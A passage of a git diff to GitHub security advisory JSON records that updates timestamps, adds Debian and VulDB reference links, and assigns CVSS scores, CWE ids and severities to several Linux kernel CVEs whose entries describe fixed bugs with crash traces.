b/advisories/unreviewed/2024/01/GHSA-v74j-582j-7x9r/GHSA-v74j-582j-7x9r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v74j-582j-7x9r", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-34436" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34436" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1819" diff --git a/advisories/unreviewed/2024/01/GHSA-vcr2-xx88-49q8/GHSA-vcr2-xx88-49q8.json b/advisories/unreviewed/2024/01/GHSA-vcr2-xx88-49q8/GHSA-vcr2-xx88-49q8.json index b6d261099b2..cad789c7ad5 100644 --- a/advisories/unreviewed/2024/01/GHSA-vcr2-xx88-49q8/GHSA-vcr2-xx88-49q8.json +++ b/advisories/unreviewed/2024/01/GHSA-vcr2-xx88-49q8/GHSA-vcr2-xx88-49q8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vcr2-xx88-49q8", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35962" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35962" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1786" diff --git a/advisories/unreviewed/2024/01/GHSA-vfvj-chxf-p8qg/GHSA-vfvj-chxf-p8qg.json b/advisories/unreviewed/2024/01/GHSA-vfvj-chxf-p8qg/GHSA-vfvj-chxf-p8qg.json index 0fabafc1eb8..12b4bee3ebc 100644 --- a/advisories/unreviewed/2024/01/GHSA-vfvj-chxf-p8qg/GHSA-vfvj-chxf-p8qg.json +++ b/advisories/unreviewed/2024/01/GHSA-vfvj-chxf-p8qg/GHSA-vfvj-chxf-p8qg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vfvj-chxf-p8qg", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37417" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37417" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1804" diff --git a/advisories/unreviewed/2024/01/GHSA-w3h6-hxc2-v9v7/GHSA-w3h6-hxc2-v9v7.json b/advisories/unreviewed/2024/01/GHSA-w3h6-hxc2-v9v7/GHSA-w3h6-hxc2-v9v7.json index abc88c543e8..5b65546020a 100644 --- a/advisories/unreviewed/2024/01/GHSA-w3h6-hxc2-v9v7/GHSA-w3h6-hxc2-v9v7.json +++ b/advisories/unreviewed/2024/01/GHSA-w3h6-hxc2-v9v7/GHSA-w3h6-hxc2-v9v7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w3h6-hxc2-v9v7", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38620" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38620" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1812" diff --git a/advisories/unreviewed/2024/01/GHSA-w634-c25w-x24v/GHSA-w634-c25w-x24v.json b/advisories/unreviewed/2024/01/GHSA-w634-c25w-x24v/GHSA-w634-c25w-x24v.json index b4ba241d2eb..a68c142205a 100644 --- a/advisories/unreviewed/2024/01/GHSA-w634-c25w-x24v/GHSA-w634-c25w-x24v.json +++ b/advisories/unreviewed/2024/01/GHSA-w634-c25w-x24v/GHSA-w634-c25w-x24v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w634-c25w-x24v", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38651" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38651" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1814" diff --git a/advisories/unreviewed/2024/01/GHSA-wvgv-79m5-4g2m/GHSA-wvgv-79m5-4g2m.json b/advisories/unreviewed/2024/01/GHSA-wvgv-79m5-4g2m/GHSA-wvgv-79m5-4g2m.json index f039120a54f..dd9d29f30f5 100644 --- a/advisories/unreviewed/2024/01/GHSA-wvgv-79m5-4g2m/GHSA-wvgv-79m5-4g2m.json +++ b/advisories/unreviewed/2024/01/GHSA-wvgv-79m5-4g2m/GHSA-wvgv-79m5-4g2m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wvgv-79m5-4g2m", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37923" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37923" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1807" diff --git a/advisories/unreviewed/2024/01/GHSA-wx5h-wrh7-xg39/GHSA-wx5h-wrh7-xg39.json b/advisories/unreviewed/2024/01/GHSA-wx5h-wrh7-xg39/GHSA-wx5h-wrh7-xg39.json index 569ad9b08e4..f6c91046868 100644 --- a/advisories/unreviewed/2024/01/GHSA-wx5h-wrh7-xg39/GHSA-wx5h-wrh7-xg39.json +++ b/advisories/unreviewed/2024/01/GHSA-wx5h-wrh7-xg39/GHSA-wx5h-wrh7-xg39.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wx5h-wrh7-xg39", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35703" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35703" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1783" diff --git a/advisories/unreviewed/2024/01/GHSA-x9j3-j6j9-8j5g/GHSA-x9j3-j6j9-8j5g.json b/advisories/unreviewed/2024/01/GHSA-x9j3-j6j9-8j5g/GHSA-x9j3-j6j9-8j5g.json index ed72f66be88..cc5a3653e05 100644 --- a/advisories/unreviewed/2024/01/GHSA-x9j3-j6j9-8j5g/GHSA-x9j3-j6j9-8j5g.json +++ b/advisories/unreviewed/2024/01/GHSA-x9j3-j6j9-8j5g/GHSA-x9j3-j6j9-8j5g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x9j3-j6j9-8j5g", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38649" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38649" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1813" diff --git a/advisories/unreviewed/2024/01/GHSA-xg93-r7c4-27gc/GHSA-xg93-r7c4-27gc.json b/advisories/unreviewed/2024/01/GHSA-xg93-r7c4-27gc/GHSA-xg93-r7c4-27gc.json index a8deaf972b2..59761b2c813 100644 --- a/advisories/unreviewed/2024/01/GHSA-xg93-r7c4-27gc/GHSA-xg93-r7c4-27gc.json +++ b/advisories/unreviewed/2024/01/GHSA-xg93-r7c4-27gc/GHSA-xg93-r7c4-27gc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xg93-r7c4-27gc", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38650" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38650" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1814" diff --git a/advisories/unreviewed/2024/01/GHSA-xh7j-grp8-cc5p/GHSA-xh7j-grp8-cc5p.json b/advisories/unreviewed/2024/01/GHSA-xh7j-grp8-cc5p/GHSA-xh7j-grp8-cc5p.json index 5c39921107d..1ffb61fa309 100644 --- a/advisories/unreviewed/2024/01/GHSA-xh7j-grp8-cc5p/GHSA-xh7j-grp8-cc5p.json +++ b/advisories/unreviewed/2024/01/GHSA-xh7j-grp8-cc5p/GHSA-xh7j-grp8-cc5p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xh7j-grp8-cc5p", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39275" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39275" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1818" diff --git a/advisories/unreviewed/2024/01/GHSA-xq8j-75w7-8q64/GHSA-xq8j-75w7-8q64.json b/advisories/unreviewed/2024/01/GHSA-xq8j-75w7-8q64/GHSA-xq8j-75w7-8q64.json index 85e5efb04be..fb4a6953420 100644 --- a/advisories/unreviewed/2024/01/GHSA-xq8j-75w7-8q64/GHSA-xq8j-75w7-8q64.json +++ b/advisories/unreviewed/2024/01/GHSA-xq8j-75w7-8q64/GHSA-xq8j-75w7-8q64.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xq8j-75w7-8q64", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35961" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35961" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1786" diff --git a/advisories/unreviewed/2024/01/GHSA-xxcm-q624-6hcv/GHSA-xxcm-q624-6hcv.json b/advisories/unreviewed/2024/01/GHSA-xxcm-q624-6hcv/GHSA-xxcm-q624-6hcv.json index d990a3dbfea..16f791c346b 100644 --- a/advisories/unreviewed/2024/01/GHSA-xxcm-q624-6hcv/GHSA-xxcm-q624-6hcv.json +++ b/advisories/unreviewed/2024/01/GHSA-xxcm-q624-6hcv/GHSA-xxcm-q624-6hcv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xxcm-q624-6hcv", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37576" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37576" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1806" diff --git a/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json b/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json index 8089b85a7bd..0bc2d090fc4 100644 --- a/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json +++ b/advisories/unreviewed/2024/02/GHSA-33cc-g737-2r5g/GHSA-33cc-g737-2r5g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33cc-g737-2r5g", - "modified": "2024-02-06T18:30:21Z", + "modified": "2024-04-09T09:31:10Z", "published": "2024-02-06T18:30:21Z", "aliases": [ "CVE-2024-1253" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.252992" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.273438" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json b/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json index fd1a2a7bb5a..0eb22c634b2 100644 --- a/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json +++ b/advisories/unreviewed/2024/02/GHSA-365x-5gg7-66qg/GHSA-365x-5gg7-66qg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-365x-5gg7-66qg", - "modified": "2024-02-06T21:30:26Z", + "modified": "2024-04-09T09:31:10Z", "published": "2024-02-06T21:30:26Z", "aliases": [ "CVE-2024-1254" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.252993" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.274042" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/02/GHSA-79cc-r4hf-5pv4/GHSA-79cc-r4hf-5pv4.json b/advisories/unreviewed/2024/02/GHSA-79cc-r4hf-5pv4/GHSA-79cc-r4hf-5pv4.json index 87eaf79fee8..16318db177a 100644 --- a/advisories/unreviewed/2024/02/GHSA-79cc-r4hf-5pv4/GHSA-79cc-r4hf-5pv4.json +++ b/advisories/unreviewed/2024/02/GHSA-79cc-r4hf-5pv4/GHSA-79cc-r4hf-5pv4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-79cc-r4hf-5pv4", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:31Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46917" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix wq cleanup of WQCFG registers\n\nA pre-release silicon erratum workaround where wq reset does not clear\nWQCFG registers was leaked into upstream code. Use wq reset command\ninstead of blasting the MMIO region. This also address an issue where\nwe clobber registers in future devices.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-668" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:08Z" diff --git a/advisories/unreviewed/2024/02/GHSA-8j25-5vwv-hm2f/GHSA-8j25-5vwv-hm2f.json b/advisories/unreviewed/2024/02/GHSA-8j25-5vwv-hm2f/GHSA-8j25-5vwv-hm2f.json index a1ba9fe0883..33c5fec76e7 100644 --- a/advisories/unreviewed/2024/02/GHSA-8j25-5vwv-hm2f/GHSA-8j25-5vwv-hm2f.json +++ b/advisories/unreviewed/2024/02/GHSA-8j25-5vwv-hm2f/GHSA-8j25-5vwv-hm2f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8j25-5vwv-hm2f", - "modified": "2024-02-27T12:31:09Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-02-27T12:31:09Z", "aliases": [ "CVE-2021-46921" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nlocking/qrwlock: Fix ordering in queued_write_lock_slowpath()\n\nWhile this code is executed with the wait_lock held, a reader can\nacquire the lock without holding wait_lock. The writer side loops\nchecking the value with the atomic_cond_read_acquire(), but only truly\nacquires the lock when the compare-and-exchange is completed\nsuccessfully which isn’t ordered. This exposes the window between the\nacquire and the cmpxchg to an A-B-A problem which allows reads\nfollowing the lock acquisition to observe values speculatively before\nthe write lock is truly acquired.\n\nWe've seen a problem in epoll where the reader does a xchg while\nholding the read lock, but the writer can see a value change out from\nunder it.\n\n Writer | Reader\n --------------------------------------------------------------------------------\n ep_scan_ready_list() |\n |- write_lock_irq() |\n |- queued_write_lock_slowpath() |\n\t|- atomic_cond_read_acquire() |\n\t\t\t\t | read_lock_irqsave(&ep->lock, flags);\n --> (observes value before unlock) | chain_epi_lockless()\n | | epi->next = xchg(&ep->ovflist, epi);\n | | read_unlock_irqrestore(&ep->lock, flags);\n | |\n | atomic_cmpxchg_relaxed() |\n |-- READ_ONCE(ep->ovflist); |\n\nA core can order the read of the ovflist ahead of the\natomic_cmpxchg_relaxed(). Switching the cmpxchg to use acquire\nsemantics addresses this issue at which point the atomic_cond_read can\nbe switched to use relaxed semantics.\n\n[peterz: use try_cmpxchg()]", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,9 +44,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-668" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T10:15:06Z" diff --git a/advisories/unreviewed/2024/02/GHSA-8mhp-pmjg-f6cw/GHSA-8mhp-pmjg-f6cw.json b/advisories/unreviewed/2024/02/GHSA-8mhp-pmjg-f6cw/GHSA-8mhp-pmjg-f6cw.json index f366cf44430..668f0a44523 100644 --- a/advisories/unreviewed/2024/02/GHSA-8mhp-pmjg-f6cw/GHSA-8mhp-pmjg-f6cw.json +++ b/advisories/unreviewed/2024/02/GHSA-8mhp-pmjg-f6cw/GHSA-8mhp-pmjg-f6cw.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8mhp-pmjg-f6cw", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:31Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46913" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nftables: clone set element expression template\n\nmemcpy() breaks when using connlimit in set elements. Use\nnft_expr_clone() to initialize the connlimit expression list, otherwise\nconnlimit garbage collector crashes when walking on the list head copy.\n\n[ 493.064656] Workqueue: events_power_efficient nft_rhash_gc [nf_tables]\n[ 493.064685] RIP: 0010:find_or_evict+0x5a/0x90 [nf_conncount]\n[ 493.064694] Code: 2b 43 40 83 f8 01 77 0d 48 c7 c0 f5 ff ff ff 44 39 63 3c 75 df 83 6d 18 01 48 8b 43 08 48 89 de 48 8b 13 48 8b 3d ee 2f 00 00 <48> 89 42 08 48 89 10 48 b8 00 01 00 00 00 00 ad de 48 89 03 48 83\n[ 493.064699] RSP: 0018:ffffc90000417dc0 EFLAGS: 00010297\n[ 493.064704] RAX: 0000000000000000 RBX: ffff888134f38410 RCX: 0000000000000000\n[ 493.064708] RDX: 0000000000000000 RSI: ffff888134f38410 RDI: ffff888100060cc0\n[ 493.064711] RBP: ffff88812ce594a8 R08: ffff888134f38438 R09: 00000000ebb9025c\n[ 493.064714] R10: ffffffff8219f838 R11: 0000000000000017 R12: 0000000000000001\n[ 493.064718] R13: ffffffff82146740 R14: ffff888134f38410 R15: 0000000000000000\n[ 493.064721] FS: 0000000000000000(0000) GS:ffff88840e440000(0000) knlGS:0000000000000000\n[ 493.064725] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 493.064729] CR2: 0000000000000008 CR3: 00000001330aa002 CR4: 00000000001706e0\n[ 493.064733] Call Trace:\n[ 493.064737] nf_conncount_gc_list+0x8f/0x150 [nf_conncount]\n[ 493.064746] nft_rhash_gc+0x106/0x390 [nf_tables]", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:07Z" diff --git a/advisories/unreviewed/2024/02/GHSA-99vg-6g53-53wq/GHSA-99vg-6g53-53wq.json b/advisories/unreviewed/2024/02/GHSA-99vg-6g53-53wq/GHSA-99vg-6g53-53wq.json index be567de9366..b26cbbecffa 100644 --- a/advisories/unreviewed/2024/02/GHSA-99vg-6g53-53wq/GHSA-99vg-6g53-53wq.json +++ b/advisories/unreviewed/2024/02/GHSA-99vg-6g53-53wq/GHSA-99vg-6g53-53wq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-99vg-6g53-53wq", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:31Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46915" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_limit: avoid possible divide error in nft_limit_init\n\ndiv_u64() divides u64 by u32.\n\nnft_limit_init() wants to divide u64 by u64, use the appropriate\nmath function (div64_u64)\n\ndivide error: 0000 [#1] PREEMPT SMP KASAN\nCPU: 1 PID: 8390 Comm: syz-executor188 Not tainted 5.12.0-rc4-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\nRIP: 0010:div_u64_rem include/linux/math64.h:28 [inline]\nRIP: 0010:div_u64 include/linux/math64.h:127 [inline]\nRIP: 0010:nft_limit_init+0x2a2/0x5e0 net/netfilter/nft_limit.c:85\nCode: ef 4c 01 eb 41 0f 92 c7 48 89 de e8 38 a5 22 fa 4d 85 ff 0f 85 97 02 00 00 e8 ea 9e 22 fa 4c 0f af f3 45 89 ed 31 d2 4c 89 f0 <49> f7 f5 49 89 c6 e8 d3 9e 22 fa 48 8d 7d 48 48 b8 00 00 00 00 00\nRSP: 0018:ffffc90009447198 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: 0000200000000000 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: ffffffff875152e6 RDI: 0000000000000003\nRBP: ffff888020f80908 R08: 0000200000000000 R09: 0000000000000000\nR10: ffffffff875152d8 R11: 0000000000000000 R12: ffffc90009447270\nR13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\nFS: 000000000097a300(0000) GS:ffff8880b9d00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c4 CR3: 0000000026a52000 CR4: 00000000001506e0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n nf_tables_newexpr net/netfilter/nf_tables_api.c:2675 [inline]\n nft_expr_init+0x145/0x2d0 net/netfilter/nf_tables_api.c:2713\n nft_set_elem_expr_alloc+0x27/0x280 net/netfilter/nf_tables_api.c:5160\n nf_tables_newset+0x1997/0x3150 net/netfilter/nf_tables_api.c:4321\n nfnetlink_rcv_batch+0x85a/0x21b0 net/netfilter/nfnetlink.c:456\n nfnetlink_rcv_skb_batch net/netfilter/nfnetlink.c:580 [inline]\n nfnetlink_rcv+0x3af/0x420 net/netfilter/nfnetlink.c:598\n netlink_unicast_kernel net/netlink/af_netlink.c:1312 [inline]\n netlink_unicast+0x533/0x7d0 net/netlink/af_netlink.c:1338\n netlink_sendmsg+0x856/0xd90 net/netlink/af_netlink.c:1927\n sock_sendmsg_nosec net/socket.c:654 [inline]\n sock_sendmsg+0xcf/0x120 net/socket.c:674\n ____sys_sendmsg+0x6e8/0x810 net/socket.c:2350\n ___sys_sendmsg+0xf3/0x170 net/socket.c:2404\n __sys_sendmsg+0xe5/0x1b0 net/socket.c:2433\n do_syscall_64+0x2d/0x70 arch/x86/entry/common.c:46\n entry_SYSCALL_64_after_hwframe+0x44/0xae", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -45,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-369" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:08Z" diff --git a/advisories/unreviewed/2024/02/GHSA-9fx9-j289-p7f2/GHSA-9fx9-j289-p7f2.json b/advisories/unreviewed/2024/02/GHSA-9fx9-j289-p7f2/GHSA-9fx9-j289-p7f2.json index f7e6b6d574e..b1f1aabd5c7 100644 --- a/advisories/unreviewed/2024/02/GHSA-9fx9-j289-p7f2/GHSA-9fx9-j289-p7f2.json +++ b/advisories/unreviewed/2024/02/GHSA-9fx9-j289-p7f2/GHSA-9fx9-j289-p7f2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9fx9-j289-p7f2", - "modified": "2024-02-27T09:31:16Z", + "modified": "2024-04-10T15:30:31Z", "published": "2024-02-27T09:31:16Z", "aliases": [ "CVE-2021-46916" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nixgbe: Fix NULL pointer dereference in ethtool loopback test\n\nThe ixgbe driver currently generates a NULL pointer dereference when\nperforming the ethtool loopback test. This is due to the fact that there\nisn't a q_vector associated with the test ring when it is setup as\ninterrupts are not normally added to the test rings.\n\nTo address this I have added code that will check for a q_vector before\nreturning a napi_id value. If a q_vector is not present it will return a\nvalue of 0.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-476" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T07:15:08Z" diff --git a/advisories/unreviewed/2024/02/GHSA-9xc4-66pr-rw85/GHSA-9xc4-66pr-rw85.json b/advisories/unreviewed/2024/02/GHSA-9xc4-66pr-rw85/GHSA-9xc4-66pr-rw85.json index 431071cd197..b900562f0c3 100644 --- a/advisories/unreviewed/2024/02/GHSA-9xc4-66pr-rw85/GHSA-9xc4-66pr-rw85.json +++ b/advisories/unreviewed/2024/02/GHSA-9xc4-66pr-rw85/GHSA-9xc4-66pr-rw85.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9xc4-66pr-rw85", - "modified": "2024-02-27T12:31:09Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-02-27T12:31:09Z", "aliases": [ "CVE-2021-46924" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFC: st21nfca: Fix memory leak in device probe and remove\n\n'phy->pending_skb' is alloced when device probe, but forgot to free\nin the error handling path and remove path, this cause memory leak\nas follows:\n\nunreferenced object 0xffff88800bc06800 (size 512):\n comm \"8\", pid 11775, jiffies 4295159829 (age 9.032s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [<00000000d66c09ce>] __kmalloc_node_track_caller+0x1ed/0x450\n [<00000000c93382b3>] kmalloc_reserve+0x37/0xd0\n [<000000005fea522c>] __alloc_skb+0x124/0x380\n [<0000000019f29f9a>] st21nfca_hci_i2c_probe+0x170/0x8f2\n\nFix it by freeing 'pending_skb' in error and remove.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -45,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-401" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-02-27T10:15:07Z" diff --git a/advisories/unreviewed/2024/02/GHSA-f93f-4q67-pcmr/GHSA-f93f-4q67-pcmr.json b/advisories/unreviewed/2024/02/GHSA-f93f-4q67-pcmr/GHSA-f93f-4q67-pcmr.json index 92f60dbba98..43a45ae6e9a 100644 --- a/advisories/unreviewed/2024/02/GHSA-f93f-4q67-pcmr/GHSA-f93f-4q67-pcmr.json +++ b/advisories/unreviewed/2024/02/GHSA-f93f-4q67-pcmr/GHSA-f93f-4q67-pcmr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f93f-4q67-pcmr", - "modified": "2024-02-27T12:31:09Z", + "modified": "2024-04-10T15:30:32Z", "published": "2024-02-27T12:31:09Z", "aliases": [ "CVE-2021-46923" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/mount_setattr: always cleanup mount_kattr\n\nMake sure that finish_mount_kattr() is called after mount_kattr was\nsuccesfully built in both the success and failure case to prevent\nleaking any references we took when we built it. We returned early if\npath lookup failed thereby risking to leak an additional reference we\ntook when building mount_kattr when an idmapped 